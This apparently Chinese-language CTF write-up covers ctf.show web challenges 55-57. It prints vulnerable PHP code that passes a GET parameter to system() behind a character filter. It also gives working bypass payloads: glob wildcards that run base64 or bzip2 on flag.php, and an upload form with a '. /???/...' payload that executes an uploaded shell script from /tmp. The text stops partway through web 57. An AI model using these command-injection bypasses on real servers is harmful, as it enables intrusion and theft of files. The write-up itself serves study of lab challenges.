web 55
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
bin目录:
bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等
解法一:
这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php
payload:c=/???/????64 ????.???
解法二:
usr/bin目录:
主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb、wget等。
我们可以利用/usr/bin下的bzip2
意思就是说我们先将flag.php文件进行压缩,然后再将其下载,即:/usr/bin/bzip2 flag.php
payload:?c=/???/???/????2 ????.???
web 56
很骚的一道题,把数字和字母都ban掉了
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
system($c);
}
}else{
highlight_file(__FILE__);
}
这个大佬有骚操作,p神的无字母数字webshell
点命令(.)
.
或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。用. file
执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件
,那就可以利用.
来执行它
可控文件
这个可控文件怎么得到?我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX
,文件名最后6个字符是随机的大小写字母。
类似于这样:
我们只要找到一个可以表示大写字母的glob通配符,就能精准找到我们要执行的文件。
ascii码表中,大写字母位于@
与[
之间
所以可以用glob通配符[@-[]
来表示大写字母
通配符
- 除了常见的?和*,还有glob支持用
[^x]
的方法来构造这个位置不是字符x - 有一个特殊约定:两个字符之间用“-”分隔表示范围,类似于这样[a-z]表示a到z的字母
Linux.sh语法
程序必须以下面的行开始(必须方在文件的第一行):
#!/bin/sh
符号#!
用来告诉系统它后面的参数是用来执行该文件的程序,解释此脚本的shell的路径
思路:
- 用post把shell传上服务器,在shell里面写好我们想执行的代码
- 用glob通配符选中可控文件并执行他
post包:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<form action="http://37a16111-50c6-4cea-bbb9-697da2a85c1d.chall.ctf.show:8080/" method="POST" enctype="multipart/form-data">
<input type="file" name="file" id="file">
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>
给c传值的payload:?c=.%20/???/????????[@-[]
成功执行了ls命令
接下来就是cat flag了
这题学到很多知识点,是个好题
web 57
还是过滤了数字和字母,不仅如此,还过滤了|\.|\,|\?|\*|\-|\=|\[
意味着刚刚那题的方法以及不适应了,因为glob通配符给ban了
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
system("cat ".$c.".php");
}
}else{
highlight_file(__FILE__);
}
文章有提示,flag在36.php//flag in 36.php
,所以可以想办法凑出一个36来
可以用这种操作$(())
,有关信息
~在$(())
中的意思是按位取反,当我再里面